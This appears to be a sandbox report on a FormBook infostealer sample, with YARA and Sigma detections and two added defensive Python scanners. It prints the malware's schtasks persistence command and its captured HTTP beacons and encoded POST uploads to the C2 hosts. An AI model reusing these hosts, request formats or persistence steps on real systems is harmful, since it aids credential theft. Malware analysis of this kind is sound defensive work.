# Analysis Report uVSV3amss8eu5Sr.exe

## Overview

### General Information

- Sample Name: uVSV3amss8eu5Sr.exe
- Analysis ID: 284766
- MD5: f5b3eeda9a5ee1d268e43145a714a048
- SHA1: a8f05b3bb98ba1345c8f881874e199fc2d1d1fb5
- SHA256: 9cf67c23623cce81e8eb40bf7eca0f951ea6aa8cdf87531511f88424fb4d6917

### Detection

- Family: FormBook
- Score: 100 (range: 0 - 100)
- Whitelisted: false
- Confidence: 100%

### Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

(Classification diagram not reproduced in this extraction.)

### Startup

System: w10x64

Process tree (in the order listed by the sandbox):

- uVSV3amss8eu5Sr.exe (PID: 6132; cmdline: 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe'; MD5: F5B3EEDA9A5EE1D268E43145A714A048)
- schtasks.exe (PID: 6520; cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'; MD5: 15FF7D8324231381BAD48A052F85DF04)
- conhost.exe (PID: 6128; cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1; MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- uVSV3amss8eu5Sr.exe (PID: 6060; cmdline: {path}; MD5: F5B3EEDA9A5EE1D268E43145A714A048)
- explorer.exe (PID: 3508; cmdline: (empty); MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 3356; cmdline: C:\Windows\SysWOW64\cmd.exe; MD5: F3BDBE3BB6F734E357235F4D5898582D)
- cleanup

## Malware Configuration

No configs have been found
## Yara Overview

### Memory Dumps
- Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b257:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
• 0x18339:\$sqlite3step: 68 34 1C 7B E1
• 0x1844c:\$sqlite3step: 68 34 1C 7B E1
• 0x18368:\$sqlite3text: 68 38 2A 90 C5
• 0x1848d:\$sqlite3text: 68 38 2A 90 C5
• 0x1837b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x184a3:\$sqlite3blob: 68 53 D8 7F 8C
- Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
• 0x926a8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x92912:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13fce8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x13ff52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9e435:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14ba75:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x9df21:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14b561:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x9e537:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14bb77:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x9e6af:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x14bcef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x9332a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x14096a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x9d19c:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x14a7dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x94023:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x141663:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0xa4017:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x151657:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0xa502a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
### Unpacked PEs

- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
• 0x8ae8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14875:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14361:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14977:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x976a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa463:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a457:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b46a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
• 0x17539:\$sqlite3step: 68 34 1C 7B E1
• 0x1764c:\$sqlite3step: 68 34 1C 7B E1
• 0x17568:\$sqlite3text: 68 38 2A 90 C5
• 0x1768d:\$sqlite3text: 68 38 2A 90 C5
• 0x1757b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x176a3:\$sqlite3blob: 68 53 D8 7F 8C
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b52:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15675:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15161:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15777:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ef:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa56a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143dc:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb263:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b257:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c26a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
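The byte sequences in the Strings columns above can be checked outside the sandbox. The script below is an added example; it is not part of the Joe Sandbox report and not the yara-signator or JPCERT/CC rules themselves. It carries the hex patterns copied from the matches above, scans a buffer for them and reports offsets in the same form the report uses. The buffer it scans by default is constructed here, and the firing thresholds in `verdict()` are my assumptions, not the published rule conditions.

```python
# Added example: stand-alone scanner for the FormBook byte patterns listed in the Yara matches.
# Not the sandbox's code and not the cited rules; patterns copied from the report, sample buffer
# constructed below, firing thresholds assumed.
import struct

# $sequence_0 .. $sequence_9 as matched by the yara-signator rule Formbook_1 above.
SIGNATOR_SEQUENCES = {
    # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax : an RDTSC timing delta
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}

# $sqlite3step / $sqlite3text / $sqlite3blob as matched by the JPCERT/CC rule above.
# Each is a `push imm32` (opcode 68); the rule's names say which sqlite3 API each constant stands for.
JPCERT_SQLITE3 = {
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}


def hexpat(spaced_hex: str) -> bytes:
    # "03 C8 0F" -> the three bytes 03 C8 0F
    return bytes.fromhex(spaced_hex.replace(" ", ""))


def push_imm32(pattern: bytes) -> int:
    """Decode the little-endian immediate of a 5-byte `push imm32` (68 xx xx xx xx)."""
    if len(pattern) != 5 or pattern[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", pattern[1:])[0]


def find_all(buf: bytes, needle: bytes) -> list:
    """All offsets of needle in buf, overlapping matches included."""
    offsets, i = [], buf.find(needle)
    while i != -1:
        offsets.append(i)
        i = buf.find(needle, i + 1)
    return offsets


def scan(buf: bytes) -> dict:
    """Map pattern name -> list of offsets for every pattern present in buf."""
    hits = {}
    for name, spaced in {**SIGNATOR_SEQUENCES, **JPCERT_SQLITE3}.items():
        offsets = find_all(buf, hexpat(spaced))
        if offsets:
            hits[name] = offsets
    return hits


def verdict(hits: dict) -> dict:
    """Assumed conditions (mine, not the published rules'): the signator rule needs 7 of its
    10 sequences; the JPCERT rule needs all three sqlite3 constants."""
    signator_count = sum(1 for name in SIGNATOR_SEQUENCES if name in hits)
    jpcert_all = all(name in hits for name in JPCERT_SQLITE3)
    return {"Formbook_1": signator_count >= 7, "Formbook_jpcert": jpcert_all}


def build_sample() -> bytes:
    """Constructed buffer: NOP filler with a few of the patterns planted at known offsets."""
    buf = bytearray(b"\x90" * 0x1000)
    planted = [
        (0x100, SIGNATOR_SEQUENCES["sequence_0"]),
        (0x380, SIGNATOR_SEQUENCES["sequence_0"]),  # the report also lists sequence_0 twice per dump
        (0x500, SIGNATOR_SEQUENCES["sequence_5"]),
        (0x800, JPCERT_SQLITE3["sqlite3step"]),
        (0x820, JPCERT_SQLITE3["sqlite3text"]),
        (0x840, JPCERT_SQLITE3["sqlite3blob"]),
    ]
    for offset, spaced in planted:
        pat = hexpat(spaced)
        buf[offset:offset + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    found = scan(data)
    for name, offsets in sorted(found.items()):
        print(f"{name:12s} " + " ".join(f"0x{o:x}" for o in offsets))
    for name, spaced in JPCERT_SQLITE3.items():
        print(f"{name}: push 0x{push_imm32(hexpat(spaced)):08X}")
    print(verdict(found))
```

Run it with a dump path (`python scan.py 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp`) and the offsets it prints are buffer offsets, the same convention as the Strings column. Two things the raw hex hides: sequence_0 disassembles to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, which is the kind of RDTSC delta the "Tries to detect virtualization through RDTSC time measurements" signature refers to, and the three JPCERT constants are the immediates 0xE17B1C34, 0xC5902A38 and 0x8C7FD853 pushed before a call, which is why they survive in every unpacked copy.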
## Sigma Overview

### System Summary:

Sigma detected: Scheduled temp file as task from temp location

- Source: Process started
- Author: Joe Security
- Data:
  - Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'
  - CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'
  - CommandLine|base64offset|contains: *j
  - Image: C:\Windows\SysWOW64\schtasks.exe
  - NewProcessName: C:\Windows\SysWOW64\schtasks.exe
  - OriginalFileName: C:\Windows\SysWOW64\schtasks.exe
  - ParentCommandLine: 'C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe'
  - ParentImage: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe
  - ParentProcessId: 6132
  - ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'
  - ProcessId: 6520
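The Sigma hit above reduces to one condition on process-creation telemetry: schtasks.exe run with /Create and an /XML argument that points into a temp directory. The script below is an added example, not Joe Security's rule or its implementation; it applies that condition to events carrying the field names shown in the hit. The first event copies the values from the report, the other two are constructed to show what the check does not flag.

```python
# Added example: detector for "schtasks.exe /Create ... /XML <file in a temp directory>", the
# behaviour behind the Sigma hit above. Not Joe Security's rule or code. The first event copies
# the report's values; the other two events are constructed.
import re

# Quoted tokens stay whole ('C:\path with spaces'), everything else splits on whitespace.
TOKEN_RE = re.compile(r"'[^']*'|\"[^\"]*\"|\S+")
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%", re.IGNORECASE)


def split_cmdline(cmdline: str) -> list:
    """Split a Windows command line, keeping quoted paths whole and removing their quotes."""
    return [tok.strip("'\"") for tok in TOKEN_RE.findall(cmdline)]


def schtasks_temp_xml(event: dict):
    """Return a finding if the event is schtasks.exe /Create with /XML in a temp dir, else None."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\schtasks.exe"):
        return None
    args = split_cmdline(event.get("CommandLine", ""))
    lowered = [a.lower() for a in args]
    if "/create" not in lowered or "/xml" not in lowered:
        return None
    xml_idx = lowered.index("/xml") + 1
    xml_path = args[xml_idx] if xml_idx < len(args) else ""
    if not TEMP_DIR_RE.search(xml_path):
        return None
    tn_idx = (lowered.index("/tn") + 1) if "/tn" in lowered else None
    return {
        "rule": "Scheduled temp file as task from temp location",
        "pid": event.get("ProcessId"),
        "parent": event.get("ParentImage"),
        "task_name": args[tn_idx] if tn_idx is not None and tn_idx < len(args) else None,
        "xml_path": xml_path,
    }


def detect(events: list) -> list:
    return [f for f in (schtasks_temp_xml(e) for e in events) if f]


EVENTS = [
    {   # values copied from the Sigma hit in this report
        "Image": r"C:\Windows\SysWOW64\schtasks.exe",
        "CommandLine": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' /XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'",
        "ParentImage": r"C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe",
        "ProcessId": 6520, "ParentProcessId": 6132,
    },
    {   # constructed: an administrator importing a task definition from a normal location
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ProcessId": 4100, "ParentProcessId": 4000,
    },
    {   # constructed: task created with /TR instead of /XML, which this rule does not cover
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r'schtasks.exe /Create /SC ONLOGON /TN "Updater" /TR "C:\Users\user\AppData\Local\Temp\svc.exe"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ProcessId": 4200, "ParentProcessId": 4000,
    },
]


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Two details from the hit are worth carrying into a production rule. Image is C:\Windows\SysWOW64\schtasks.exe while the command line names System32: the 32-bit parent is subject to WoW64 file system redirection, so match on the image file name rather than the full path. And the /XML file (tmpB8CB.tmp) is a temporary file, so capture it from the host or sandbox promptly; the task name Updates\JOOUCiAlE matches the dropped C:\Users\user\AppData\Roaming\JOOUCiAlE.exe listed later in this report, but the report does not print the XML, so what the task actually runs is not confirmed here.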

## Signature Overview

### AV Detection:

Multi AV Scanner detection for domain / URL
- Source: http://www.camdio.xyz/k8b/, Virustotal detection: 6%

Multi AV Scanner detection for dropped file
- Source: C:\Users\user\AppData\Roaming\JOOUCiAlE.exe, Virustotal detection: 23%

Multi AV Scanner detection for submitted file
- Source: uVSV3amss8eu5Sr.exe, Virustotal detection: 23%

Yara detected FormBook
- Source: Yara match, file source: 0000000D.00000002.620877923.0000000002C50000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000000.00000002.377422904.000000000380A000.00000004.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000003.00000002.430665335.0000000001CA0000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000003.00000002.426364179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 0000000D.00000002.620844843.0000000002C20000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 0000000D.00000002.619161328.0000000000500000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 00000003.00000002.430642110.0000000001C70000.00000040.00000001.sdmp, type: MEMORY
- Source: Yara match, file source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, type: UNPACKEDPE
- Source: Yara match, file source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file
- Source: C:\Users\user\AppData\Roaming\JOOUCiAlE.exe, Joe Sandbox ML: detected

Machine Learning detection for sample
- Source: uVSV3amss8eu5Sr.exe, Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
- Source: 3.2.uVSV3amss8eu5Sr.exe.400000.0.unpack, Avira label: TR/Crypt.ZPACK.Gen

Found inlined nop instructions (likely shell or obfuscated code)
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe, code function: 4x nop then pop edi, 3_2_00416BF6
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe, code function: 4x nop then pop edi, 3_2_0040E38C
- Source: C:\Windows\SysWOW64\cmd.exe, code function: 4x nop then pop edi, 13_2_0050E38C
- Source: C:\Windows\SysWOW64\cmd.exe, code function: 4x nop then pop edi, 13_2_00516C45

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
- Source: Traffic, Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden, 34.102.136.180:80 -> 192.168.2.3:49765

HTTP GET or POST without a user agent
- Source: global traffic, HTTP traffic detected:
  GET /k8b/?8pMx8v9p=Sc78I+Kxf/VxlwaPaPJkOLmTTyipGii8jZ5N2jAlgkHWx8NYJM9FuUX0xspAlguusSd1&Gzux=Wb2pdLjh7 HTTP/1.1
  Host: www.mensajera-radio.online
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (no printable bytes)
- Source: global traffic, HTTP traffic detected:
  GET /k8b/?8pMx8v9p=vAYaSr9qvHk7KCO7uWDlCoh8YGLtM5zRcLRoyBCgnX/aO/BnpSe24HN21iT/EXq7SkdF&Gzux=Wb2pdLjh7 HTTP/1.1
  Host: www.camdio.xyz
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (no printable bytes)

Internet Provider seen in connection with other malware
- Source: Joe Sandbox View, ASN Name: OVHFR
- Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
Uses a known web browser user agent for HTTP communication
- Source: global traffic, HTTP traffic detected:
  POST /k8b/ HTTP/1.1
  Host: www.mensajera-radio.online
  Connection: close
  Content-Length: 414
  Cache-Control: no-cache
  Origin: http://www.mensajera-radio.online
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.mensajera-radio.online/k8b/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 5a 6d 64 52 59 4e 74 37 79 58 50 41 66 45 75 59 66 4f 74 62 58 53 42 46 67 61 69 37 73 6b 62 76 7a 63 67 6c 30 4c 41 34 38 4e 68 4c 64 74 64 6b 67 32 6e 73 75 64 73 71 53 61 6a 6a 58 41 76 48 4c 28 6a 74 44 79 6b 37 61 52 5f 54 6e 57 33 39 49 78 33 6a 30 68 44 6f 6e 4f 57 7e 49 66 4a 64 31 78 4f 66 64 77 74 79 7a 70 6f 67 46 42 4d 4d 45 67 48 75 58 45 45 72 39 38 74 64 34 6c 63 55 41 69 42 4a 2d 43 41 52 32 78 51 6b 79 65 41 64 63 7e 57 33 49 77 7a 41 38 4c 57 56 6a 41 72 42 41 34 69 62 48 53 43 45 33 72 6a 6c 70 67 51 6f 5a 65 6a 70 47 59 58 69 52 69 37 66 38 4d 41 78 51 79 6f 44 6c 78 44 72 39 7a 56 41 7a 70 66 78 35 33 33 68 66 35 78 5a 79 48 2d 4a 55 53 79 62 58 4a 43 79 31 30 50 45 72 71 4c 62 72 4e 30 74 7a 77 6e 6b 57 72 53 7e 48 37 36 46 4a 57 47 76 6d 39 6e 45 32 73 33 74 7a 6c 6a 59 30 4a 51 4b 36 4d 68 66 70 73 79 32 4b 33 4f 70 7a 70 31 46 4f 6e 33 7a 72 39 41 56 30 28 65 35 64 72 6a 42 75 35 5f 57 30 63 5f 52 4e 58 6f 47 64 6c 74 46 67 38 61 6a 38 65 66 54 75 6e 66 75 49 79 75 30 66 78 42 50 78 76 7a 45 41 4b 71 68 71 6c 63 78 2d 28 46 47 66 4a 69 34 39 67 36 49 5f 53 50 6b 46 67 71 79 5f 59 4e 4a 4a 4f 34 77 30 48 37 6b 72 38 6d 35 66 56 62 78 6b 59 30 59 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: 8pMx8v9p=a-3GWZmdRYNt7yXPAfEuYfOtbXSBFgai7skbvzcgl0LA48NhLdtdkg2nsudsqSajjXAvHL(jtDyk7aR_TnW39Ix3j0hDonOW~IfJd1xOfdwtyzpogFBMMEgHuXEEr98td4lcUAiBJ-CAR2xQkyeAdc~W3IwzA8LWVjArBA4ibHSCE3rjlpgQoZejpGYXiRi7f8MAxQyoDlxDr9zVAzpfx533hf5xZyH-JUSybXJCy10PErqLbrN0tzwnkWrS~H76FJWGvm9nE2s3tzljY0JQK6Mhfpsy2K3Opzp1FOn3zr9AV0(e5drjBu5_W0c_RNXoGdltFg8aj8efTunfuIyu0fxBPxvzEAKqhqlcx-(FGfJi49g6I_SPkFgqy_YNJJO4w0H7kr8m5fVbxkY0Yw).
- Source: global traffic, HTTP traffic detected:
  POST /k8b/ HTTP/1.1
  Host: www.mensajera-radio.online
  Connection: close
  Content-Length: 167694
  Cache-Control: no-cache
  Origin: http://www.mensajera-radio.online
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.mensajera-radio.online/k8b/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw (cut off in this extraction): 38 70 4d 78 38 76 39 70 3d 61 2d 33 47 57 59 75 52 43 34 42 38 28 44 33 4f 50 70 6b 63 63 65 7e 7a 52 78 61 73 4d 54 4b 63 6c 4d 49 74 76 7a 73 73 6a 32 6a 30 39 64 39 68 4a 65 46 51 7e 51 32 6f 71 75 64 72 75 53 47 66 71 67 38 6e 48 4b 37 5a 74 44 36 72 68 73 74 32 43 58 58 33 37 6f 30 47 68 77 49 58 6f 6c 4b 6a 77 4c 7a 52 59 31 39 4f 62 75 41 76 33 57 30 72 6e 45 4e 35 42 55 38 43 73 54 59 42 6f 4f 34 56 61 75 74 36 46 46 36 48 65 39 65 4c 64 57 41 48 75 46 71 62 41 63 36 64 72 37 4e 31 4f 37 54 53 59 43 41 4a 4e 68 34 68 46 48 36 45 52 46 7a 46 76 37 4d 35 76 5a 75 52 70 46 34 48 72 47 4f 71 62 5f 6f 49 69 77 53 43 49 77 4a 46 7a 71 66 33 57 47 46 55 39 61 7e 6c 70 36 46 71 65 69 72 52 46 32 72 5f 56 57 68 35 68 30 34 44 63 4f 47 7a 61 61 5a 73 6c 54 67 59 71 78 32 61 30 33 62 79 57 37 61 6b 67 6d 39 63 58 6d 73 72 6e 6a 46 62 54 68 34 63 4e 72 63 66 4e 61 63 6d 79 62 4c 50 75 77 41 75 4b 50 4f 7a 7e 36 6c 55 64 6b 76 4d 79 64 75 76 42 59 63 42 66 55 64 67 59 76 28 6a 47 64 6b 53 46 68 39 48 69 4e 4b 66 53 5f 47 54 76 76 75 79 6a 50 78 6d 4a 6c 7a 4c 57 33 79 41 68 71 74 63 78 50 50 6a 46 4d 70 69 38 76 49 35 49 65 53 50 6b 31 67 71 72 50 5a 70 61 63 54 6f 7a 45 76 32 6f 70 38 41 79 36 34 75 37 51 64 41 4d 5a 33 69 4b 59 28 56 6f 34 6c 74 66 77 49 4a 6b 6b 42 37 43 62 58 47 31 6e 74 42 78 6c 48 46 45 4e 30 65 36 50 28 35 33 6d 49 32 76 50 4b 34 72 2d 58 4e 32 58 70 46 49 71 38 37 65 71 45 6b 30 32 67 48 75 71 47 36 73 43 33 51 33 35 49 57 56 49 78 47 37 42 63 76 77 36 50 5f 45 57 31 69 45 49 4e 70 6c 62 7a 34 4c 74 59 41 7e 2d 47 43 32 68 50 50 73 70 47 62 41 58 47 6e 6c 33 62 43 45 4f 30 4b 43 78 31 76 43 77 31 6a 55 78 6f 46 45 5a 36 5a 64 67 6f 6a 68 30 30 62 64 6f 7e 67 68 78 79 4d 41 56 78 51 37 51 67 76 58 34 30 75 53 48 63 6c 4c 79 4e 67 51 66 43 39 6d 31 50 64 7a 54 38 33 62 34 35 6a 4a 51 6e 7a 35 45 41 30 6a 65 4f 5f 42 69 59 6a 34 58 68 58 37 4c 4e 72 6e 49 54 35 34 36 61 37 65 6b 6e 4a 4d 47 57 33 70 72 4d 32 61 5a 53 4f 6d 62 77 6e 6e 59 65 36 43 39 49 6f 30 68 4a 50 28 6f 78 63 46 71 6e 70 70 49 52 43 70 78 42 6f 47 61 55 63 59 58 6a 42 52 4f 62 32 42 6d 52 61 73 62 62 55 37 52 6e 59 31 2d 78 59 55 2d 41 44 42 49 75 76 45 64 47 67 4d 46 42 6c 66 4b 52 69 5a 38 6d 4a 50 48 67 76 79 34 6f 68 38 4e 57 6e 74 4e 44 73 79 59 38 7a 28 4e 